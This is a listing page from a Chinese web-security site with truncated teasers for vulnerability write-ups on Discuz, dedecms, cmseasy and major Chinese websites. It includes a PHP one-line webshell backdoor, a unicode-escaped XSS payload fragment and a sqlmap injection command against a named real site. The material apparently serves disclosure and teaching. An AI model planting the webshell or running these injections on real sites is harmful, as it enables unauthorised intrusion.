Namazu cgi过滤不严敏感信息搜索及预览安全问题关注热度:13

Namazu来自日本神话，神话中说日本列岛被一条大鲶围绕着，可以引起地震等，这条大鱼就叫Namazu。日本大学、政府站点中有套常用的程序也叫Namazu，这套程序主要用于搜索网站内容。程..[详情]

php://input一句话木马 - 网站安全 - 自学php关注热度:85

在调研dedecms的历史漏洞时，发现了dedecms安装文件曾经出过被植入后门的漏洞（SSV-ID站点include目录下shopcar class php文件被植入一句话木马）@eval(file_get_contents( 39;php: input 39;))用脚本phpinp..[详情]

爱奇艺某功能挖出网站多处存储型XSS - 网站安全关注热度:11

借爱奇艺某功能挖出网站多处存储型XSS（打遍天下无敌手）STEP1 我们在一个具体的视频页面发起一个投票，标题是XSS代码，具体选项也是XSS代码，点击提交STEP2 查看我们的投票STEP3 我们..[详情]

Discuz! 后台第三方插件上传任意后缀文件拿shell（关注热度:56

Discuz!利用插件拿Discuz!论坛shell的文章：http: www 2cto com Article 201307 230113 html拿shell，我在这篇文章里面用到的插件是zend加密的，可能有系统不支持。今天谈的这个利用插件拿shell，是未加..[详情]

Discuz! 再次绕过安全密码安装插件 - 网站安全 -关注热度:34

第一版的绕过安全密码装插件：http: www 2cto com Article 201310 248549 html第一版后台拿shell：利用插件拿Discuz!论坛shell的文章http: www 2cto com Article 201307 230113 html第二版：Discuz! 后台第三..[详情]

Discuz! 绕过安全密码安装插件 - 网站安全 - 自学关注热度:13

前段时间我写了个利用插件拿Discuz!论坛shell的文章：http: www 2cto com Article 201307 230113 html很多人说安装插件需要 安全密码 ，其实很早我就发现安全密码可以绕过的，这样就能在安装插件的..[详情]

腾讯某站储存型xss及修复 - 网站安全 - 自学php关注热度:16

出现问题的站点http: bbs qrobot qq com在发帖处的flash 里插入构造好的xss代码http: 1 com u0022 u003e u003c u0069 u0066 u0072 u0061 u006d u0065 u002f u006f u006e u006c u006f u0061 u0064 u003d u0061..[详情]

Wordpress插件Quick Contact Form 6.0 持久型xss - 网站安全关注热度:12

=======================标题=====Quick Contact Form - Persistent Cross Site Scripting Vulnerability作者======Zy0d0x开发者======Quick Plugins - http: quick-plugins com 受影响产品========..[详情]

cmseasy getshell 0day - 网站安全 - 自学php关注热度:86

代码如下：celive index php 代码：$_SESSION[ 39;thislive 39;] = md5(time()); $_SESSION[ 39;thislivetmp 39;] = $_SESSION[ 39;thislive 39;]; if ($config[ 39;customer_info 39;]) {..[详情]

dedecms(织梦)album_add.php sql注入 - 网站安全 - 自学关注热度:26

dedecms一处注入，较鸡肋，之前变量覆盖的漏洞太轰动了，所以一直没发出，之前5月份最新版本测试的漏洞需要会员，所以比较鸡肋啦发表文章处，post表单的mtypesid可以注入 dedecmsnew me..[详情]

干掉盗号网站全过程 - 网站安全 - 自学php关注热度:62

一、被盗号找上门今天一打开QQ邮箱，看到个群邮件这货以发聚会照片为名义给出了一个网址http: 202 194 131 20 xcb xcb link php?id=73url=http: yyhhj emy in cc ?933046我估计着因为这段网址前半部分h..[详情]

Ajax的安全问题 - 网站安全 - 自学php关注热度:414

篇文章是关于我们探索基于Ajax的应用程序在评估过程中遇到的主要安全问题。AJAX：Ajax或非同步JavaScript和XML是一个相对较新的和动态的Web技术，其工作在异步方式与服务器进行交互。在..[详情]

当当网某业务静态SQL注入 - 网站安全 - 自学php关注热度:39

漏洞页面http: movie dangdang com list longBestSelling_C05* 01_P1 htm注入语句：python sqlmap py -u http: movie dangdang com list longBestSelling_C05* 01_P1 htm --dbms mssql --dbs发现和昨天那..[详情]

联想某站点任意用户密码重置 - 网站安全 - 自学关注热度:27

存在问题的站点：联想开发社区1 注册两个帐号，信息如下（可根据浏览器区分）：2 通过chrome浏览器调试工具修改其中一个用户信息如下：3 点击提交并抓包得到如下数据信息；4 我们将..[详情]

印象码验证存在重大逻辑问题可以简单绕过(含修关注热度:14

验证设计存在逻辑问题，验证通过的key对没有时间限制。一次正常通过的key对可以无限次通过验证，验证码形同虚设上述代码为印象码提供的sdk，可以看到其网站主后台判断用户是否通..[详情]